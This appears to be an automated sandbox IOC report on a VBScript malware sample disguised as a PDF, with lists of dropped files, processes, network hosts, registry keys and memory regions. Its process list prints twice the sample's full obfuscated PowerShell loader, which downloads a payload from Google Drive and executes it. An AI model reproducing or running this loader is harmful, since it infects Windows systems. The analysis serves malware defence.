IOC Report
pko_trans_details_20240909_105339#U00b7pdf.vbs

loading gif

Files

File Path
Type
Category
Malicious
pko_trans_details_20240909_105339#U00b7pdf.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jk3voiqc.xmh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mdwt1c4t.ovm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rcw3c0ru.vjx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj0vrkm1.bqf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Depraves.Ter
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\pko_trans_details_20240909_105339#U00b7pdf.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont= (Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata- Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets ',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig ';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang (Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets ' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb ');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$ NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hjkommisrs='Rakkerens';$Troublesome=${host}.Runspace;If ($Troublesome) {$Telephoning++;$Hjkommisrs+='Cacodorous';$Achyrodes='su';$Hjkommisrs+='Coruscate';$Achyrodes+='bs';$Hjkommisrs+='Tungusian';$Achyrodes+='tri';$Hjkommisrs+='Sonatinen';$Achyrodes+='ng';};Function Hammondorglets($Stavnen){$Vouchering=$Stavnen.Length-$Telephoning;For( $Svirrefluerne=5;$Svirrefluerne -lt $Vouchering;$Svirrefluerne+=6){$Ulceromembranous+=$Stavnen.$Achyrodes.'Invoke'( $Svirrefluerne, $Telephoning);}$Ulceromembranous;}function Markedsadgang($Diabolizing){ . ($Udglatter174) ($Diabolizing);}$Footslogging=Hammondorglets 'Di,boMI,trooKalorztausci ordtlHormelProseaB,gge/Feltr5 tim..Tegne0 Dm.n Baggr(GutwiWTmre iIul,snschrod He toEt.niwOb.igsCensu MedbyN InocTRdvin Derin1dorde0Tuber.Ersta0 Ch,f;P.arm NondiWHarstiUnsiznSpeed6Thorv4Tamil;M,gal Deco,xGeebu6heide4Misfo; Subs purtrProfivCrypt:Stork1 Evan2 Trep1Tilba.Fort 0Bogde)Piast BugtaGV skoe Skatc HandkMartyoSkavg/ Zai 2.lvia0Jazzh1Hukom0Ekspo0 B ni1Hasar0 Prie1Cacoe oldnFBis.aiKo sirSkareeFjolrf Uds oF,ugtxregio/ Doub1Cupre2 Okku1calip.indbj0Ve de ';$Uncoveredly=Hammondorglets 'DanneU manusRygerePuff.r ,lag-.riguA Sc pg T,umeTaramnProditMos k ';$Raasylte=Hammondorglets 'PsychhJomont G.smtImmovpChests Medd:Rub.i/Antia/ Obstd StjerSlanki Amylvf rmseAbbed..amesgWis,aoPorphoDk,drgSukatl Per eBorge. BrancFrekvoP.nkum Gimp/Progru UdvacKe sk?PetiteC irpxA elspAudi,ofa,igr Su gt gmnd=bochedGr peoDelsaw FejlnAdvanl XerooAntema.nseddBevge& nonliTabordFlubd= iorh1O chf2F.ndeyTs.tsWJustehEmbryD elytklserePForte2 StueA C,nf-And,rDIrr,t0Reinv-,lmmeP BeloYMist Y CallqC,clo5FladtcHvinty YatafVe,ruhInf.ueCirkuo C.gn3Li,deEO,lfopDeut,S.olmuePr.je_Ph.ll9K.ukaKSankt ';$Ceratitidae=Hammondorglets 'B vog> Stag ';$Udglatter174=Hammondorglets 'cedryiChaloeMididx Rat, ';$Unshrinkingly='Ubiquities';$Superfluity = Hammondorglets 'KneeleDor.oc D,odhLand,o Vat. Opti%Rigwia BaadpDok,op.hrondDrupea tetrtPennya forj% Agna\Hjt aDDi,kke,nsigpCo rarIbrugaCantovTnd.aeOverosAmi r.Unc mTM,ndeeMisk,r svin Togvo& Pseu&Setba LnposeIonizcForedhTus.aoPol s MacrtAksem ';Markedsadgang (Hammondorglets 'Salts$ ForlgBeslalComidoTwee.bAfr,kaForurlMealy: In.assa,rou DorsbFiksatVix,nr A.vroIvi.dpSkumliVal.ts mmorkWyteseLamesskafka=Snide(Gldelc,ennemUnderdNdlgn Ta,t/Sa,myc Bug. Erys$UdspiSUnrepuAphrapConc.e Chamr Hebrftressl Bilyu IndkiH.mentBlgety ndri)Fundi ');Markedsadgang (Hammondorglets ' P.gt$ Re rgbudgelU vikoRenprb Co,uaMavedlM nil:.altecNyskal MdeaoHloftc BetokUdforwObfusiBru ssFemkaeAtlan=Ude.u$PsaltRRoastaGenskaSebi,sKysery St,alLitretGapcheKo,em.ReagesTyponp.rotol udraifatt.t ewil(fyrst$f,ldeC .ndee ngenrUndera,mmettGymnaitero,tM,aneiWrongd Shera oreteBrtte)Galop ');Markedsadgang (Hammondorglets 'Tilbe[ SchlNWeigheAc uitVeget.mun.cSst,leeDeta.rC,llbvBaga,iIm,osc Fonde SacrPCosm,oIntimiKritinHorn tForesMVagt aIncubnClinoa bestg Neo.emostsrSudat]Bilic:Gapat:SamviSFrouneStikkcBorgeuTegnirHar,miPrincts.jedyCystePKr ftr MoneoSe.ietSp jtoBruttc pando BoatlAnyho L sse=Nonco .hein[LitioNAdulaeVe let no.c.Und rSPej se.useuc F ruu.ersir lgtsiDepentKrydsyEgaliPunlyrrC.mpio GesttAntinoDi,sec.evevoExosmlAdr,sT Forsy VindpHaandeScolo]heter:No,sy:TheokTOveral,elvasp,rie1 Afkl2,onno ');$Raasylte=$clockwise[0];$Tetrodont= (Hammondorglets 'Sulte$un.vigSeldsl RuskoParapbSporeaKorrul D,ma:Tj rijPolonaPe tagfus,ttUn nurproloe Arkege,viplRos,ae ReinmSgs,aeGen,en.inittKreateUltrarGenersjabbe=ml,esNNondeeknaldwAgata- Syn,O WeigbSe skj yoyoe Apokc DybhtSighe I dtgSProteyCarpasTroldtMorteeUn afmClytu.C,hadN Brode ErhvtPhoto. ,pseWAfladeRe ecb Tha.C.irculMiljti Sv,geBakshnSemipt');$Tetrodont+=$subtropiskes[1];Markedsadgang ($Tetrodont);Markedsadgang (Hammondorglets ',umme$Go aljTikanaSol,igCinemt.ismarRum,oeByretghem,tlSubsteTeen.m FigueKejsenRadertOpganeSolu.rMyelasLa,nl.UnionHAfkr.e ontoaSerridDishaeUbenyrKommesPothe[Infor$k igsUinsannNon.ec.italoAuralvOl.ebeIndskrT.takeExterdBeeislEkstry Teg ]telel=Spgel$ParfoFPr.teoC.tetoPump,tHumbls L.cul BekeoGennegTaenkgBaobaiEdifin So agTas,a ');$Sidedeling=Hammondorglets 'Sho.p$ KatejUnderaWarplgP.teotStalwr Menie antrg.ublelPsyche Ae imforlgeStilen VrtstDus yechat rGema,s U.sp.,lemeDDilu oPhaenwpartunC,epilHuddlo Overa.adeadForhaF.rowsi amfulRenteeUforp(Un st$StepdRbifalaMassoaAmin.sSorboyCa inlFors.tNum,eeHawbu,P,ast$ TerzNBordfoToddirNonphmPseudaGarden,ecrid FainyScapu)Astig ';$Normandy=$subtropiskes[0];Markedsadgang (Hammondorglets 'Postm$RescugBarskl .alsoG.brkbCartiaFri tl uhfj:AktivDUd lidSkolesFi keuDetailInforyFuldbkSchemk ositeMl,esrSalamskanon=.nvot(Joy.oTAconie .ratsFore.tMunyc-TumfiPAfvasaCivilt capohStorh figen$DdsatN CavaoLang rUncofmAbessaBladnnRepredCabobyFaksi)Lyses ');while (!$Ddsulykkers) {Markedsadgang (Hammondorglets 'S,kka$Millig KanalWungeoPaasybLy,laaIndprlMicr,:PhiloFbe,ygl TyphaDemokmSikkeb Frite RenoaBanjouTilsvxPlast1overm8 Flo,9Bagfl=,oryp$FacittRe sirEr.onuHjde e Mali ') ;Markedsadgang $Sidedeling;Markedsadgang (Hammondorglets 'Sma pSC,armt GennaTilgrrLeucotPtyka-Brn sSTitall Al ieKometeHvernp Nitr Nonio4Leame ');Markedsadgang (Hammondorglets ' eute$Ind.igNske,lN.naso VenebRoberaBrinilT.lde:T ollD TegndsupersKortsuAuckal Beh.yHaandkH.andk Pr,seProgrrAdvarsEfter=E.ige(RubbeTFranteUtenssValgktprimt-EntroPSa mea Overt,ndishRaphi Afhng$I,gleNManaco Taksr rstmSubtraOrtopn BresdLawleyMinef) Alta ') ;Markedsadgang (Hammondorglets ' m.rs$ CollgH.ghclGeneroS.bsibLangtaWiniflFor.s:Re isNSu,cooFarbrmRinghaWoofedpa.ise,hutais,dkonHymenvUmmvaa NippsMonasiChattoSkrosnApyroeVaduznStilms Van,2Balan= Mok.$ RalfgStudilAfspioLazulb Indva Lektl Over:KrokeDdemi.eRotatpEndo eCatamrEnformstriksK age+Tilfl+Gaspr% Fre $OutracSektilWr.tho Qua cMoseokMorgewUnpreiEndotsOttine Ngte.Afkric edio Datau Indkn OvertDispl ') ;$Raasylte=$clockwise[$Nomadeinvasionens2];}$Strikketj=327597;$Firmabilerne54=27440;Markedsadgang (Hammondorglets 'Deal $IntergTrucklSadneoMashob VillaPolisl Cole:moolvT DiserK nspaSic.bnStv.esC ifta.iddllTelerp F.rriKlummn,oncueManutrPresb Siste=Bro.z Stry.GSadomeIstant.ursu-OvervCTrvejoOvertncrypttN.mpheLyco nVejkrtR.sst Semi$RedniNSvejfo nofrDrvtym O daa uselnBiki.dSmedey Baxy ');Markedsadgang (Hammondorglets 'Knowe$BlomkgForstlQuineo Mo obLe,ioaBookilHalvk: S inIPalfrn C.fedOgdenu AcepsSmilet Tr nrMidteiFejema Min lFlad,iAtions,arveeDanefrMutcheFamilsStruc Fa.ta=N nap Unhum[ PredSHemsfy TaabsImpert.istre hovmm Brow.AntisC Un eoGaullnfre avT romera.sirHjer tStark].offi:Baand: BeboFvaginr DepeoFleshmPolitBSprayaInde.sKortbeSlim.6 .elv4GingmS P.nctPe,agrPhreniFlertnPr digA lah(Posts$,ejseTOvererKnnetaW tern AmstsCowicabrkdelBlok pFortri Stryn tokseInquir Kurd),rais ');Markedsadgang (Hammondorglets ' S mm$margag oelolVelseoRecitbUnconaBokselSkr,p:BarbeHBysa.j Geisn AkwaiEmaljvV,noueCh ysaKli,tuFngsls SkirpKlinkrTilkoomanufgUnbeaeUsyren Ta.re Ernr Sch o=S.rud Indd [ReploSTrlleyPrimesMeteotAlveoeemittmLark,.PennaTbrisaelegemx ,nddtStipu. Mis.EK audnSeawacDigreo yndidBaregiHelfln Kyl.gMisas]Subur:Virks: .innAMusicSDalsfCInsemIBindsIDisc..HyperGSmykkeOverrt Pr,eSS.otdtu,nderSunbuiPr panGe.ergLahnd(Re,is$AskleI B.denMuddedT reruCountsUdflyt bil,rFrdigi Ta,baAlminlTel.fiMeg tsBookneSeamar,aalseFllessForsk)Gwynb ');Markedsadgang (Hammondorglets 'Resu $TerrogKolbtlKerneoOversb Non aSip ulVioli:AntikSLas.suSpec lE dikf Tra.iTov.rtEnsomtEnhedeM,rritMeta.=Kr,nr$ NeutHTikkejCalcunDiscuiScreavUnguaeMilitaLandsuafstnsAwakipafbryrKadeto ChoogEskameLertjnIlte ebevge.Dekods Dysmu UnivbBlacksSangstsneglr SteriUng.inudpingR.izo( Maoi$Pros SAmbu,tOv,rcrHumm.i nkubk StabkEar he TakttstraujMa.ch,Renmo$ApophFdetaliTndstr s bcm.iskuaReif,bFitchiGen,nl Pedue racr,orfrnNyttiePrinc5Tunes4 ,ond)cyber ');Markedsadgang $Sulfittet;"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Depraves.Ter && echo t"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

URLs

Name
IP
Malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
https://drive.googPR
unknown
http://drive.usercontent.google.com
unknown
http://crl.micro
unknown
http://pesterbdd.com/images/Pester.png
unknown
https://aka.ms/pscore6lB
unknown
http://crl.microsoft
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://drive.usercontent.google.com/c
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.google.com
unknown
https://drive.usercontent.googh
unknown
https://drive.usercontent.google.com
unknown
https://drive.usercontent.google.com/
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
There are 14 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bg.microsoft.map.fastly.net
199.232.214.172
drive.google.com
142.250.185.238
drive.usercontent.google.com
142.250.181.225

IPs

IP
Domain
Country
Malicious
142.250.181.225
drive.usercontent.google.com
United States
142.250.185.238
drive.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\Explorer.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
Zvpebfbsg.Jvaqbjf.Rkcybere
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count
HRZR_PGYFRFFVBA
There are 9 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1BCD84EF000
trusted library allocation
page read and write
malicious
5946000
trusted library allocation
page read and write
malicious
6F35000
heap
page read and write
malicious
9630000
direct allocation
page execute and read and write
malicious
C6E5000
direct allocation
page execute and read and write
malicious
95F0000
trusted library allocation
page read and write
4665000
heap
page execute and read and write
AC03EB7000
stack
page read and write
B80000
trusted library section
page read and write
7FB0000
trusted library allocation
page read and write
7FFAACBCA000
trusted library allocation
page read and write
2A084CE4000
heap
page read and write
9EE5000
direct allocation
page execute and read and write
7340000
trusted library allocation
page read and write
2D30000
heap
page read and write
95E0000
trusted library allocation
page execute and read and write
4670000
heap
page read and write
1BCE0970000
heap
page read and write
9135000
trusted library allocation
page read and write
AC03A7E000
stack
page read and write
8280000
trusted library allocation
page read and write
7FFAACACC000
trusted library allocation
page execute and read and write
592F000
trusted library allocation
page read and write
6FEE000
stack
page read and write
737B000
trusted library allocation
page read and write
7FFAACC40000
trusted library allocation
page read and write
2A084715000
heap
page read and write
7210000
direct allocation
page read and write
B40000
trusted library section
page read and write
2A084711000
heap
page read and write
6F6E000
heap
page read and write
27CE000
stack
page read and write
227D0000
remote allocation
page read and write
2A084C6C000
heap
page read and write
2A084840000
remote allocation
page read and write
2259D000
stack
page read and write
2A082BD0000
heap
page read and write
2A082C5E000
heap
page read and write
1BCC9780000
trusted library allocation
page read and write
7FFAACC00000
trusted library allocation
page execute and read and write
2A084D11000
heap
page read and write
9680000
direct allocation
page read and write
5C55000
remote allocation
page execute and read and write
745E000
stack
page read and write
2A084DE6000
heap
page read and write
EB4C0FF000
stack
page read and write
7FFAACA12000
trusted library allocation
page read and write
1BCC8988000
trusted library allocation
page read and write
7390000
heap
page execute and read and write
AC03BFD000
stack
page read and write
9D40000
direct allocation
page execute and read and write
6F6E000
stack
page read and write
2A084C43000
heap
page read and write
6F6E000
heap
page read and write
2A082D03000
heap
page read and write
1BCC8470000
heap
page read and write
1A347B20000
heap
page read and write
2A082D0F000
heap
page read and write
9392000
heap
page read and write
7220000
direct allocation
page read and write
717E000
stack
page read and write
71D0000
direct allocation
page read and write
2A084C91000
heap
page read and write
2A082C50000
heap
page read and write
AC040BE000
stack
page read and write
B2E5000
direct allocation
page execute and read and write
2A082C6E000
heap
page read and write
70FF000
stack
page read and write
7FFB1E0E1000
unkown
page execute read
B5B000
heap
page read and write
93E5000
heap
page read and write
4855000
remote allocation
page execute and read and write
2A084737000
heap
page read and write
2D10000
trusted library allocation
page execute and read and write
7FFAACBB0000
trusted library allocation
page read and write
2C29000
trusted library allocation
page read and write
2A082CBD000
heap
page read and write
7FFAACC90000
trusted library allocation
page read and write
2BAF000
stack
page read and write
2B6E000
stack
page read and write
921E000
stack
page read and write
7520000
trusted library allocation
page read and write
2A082CC0000
heap
page read and write
7FFAACA13000
trusted library allocation
page execute and read and write
74C0000
trusted library allocation
page read and write
1BCE0A50000
heap
page read and write
2A084D10000
heap
page read and write
A09000
heap
page read and write
2A084D61000
